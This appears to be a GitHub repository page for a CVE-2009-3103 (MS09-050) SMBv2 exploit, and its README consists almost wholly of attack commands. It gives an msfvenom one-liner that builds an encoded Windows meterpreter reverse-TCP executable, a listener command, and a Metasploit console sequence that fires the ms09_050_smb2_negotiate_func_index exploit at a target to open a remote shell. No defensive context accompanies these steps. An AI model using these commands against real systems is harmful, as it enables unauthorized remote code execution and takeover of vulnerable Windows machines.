Skip to content

sec13b/ms09-050_CVE-2009-3103

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

ms09-050_CVE-2009-3103

CVE-2009-3103 ms09-050


# One liner to create/generate a payload for windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/

One liner start meterpreter

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.1.1;set LPORT 4444;run;"


msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 192.168.1.1
msf exploit(ms09_050_smb2_negotiate_func_index) > run

About

CVE-2009-3103 ms09-050

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages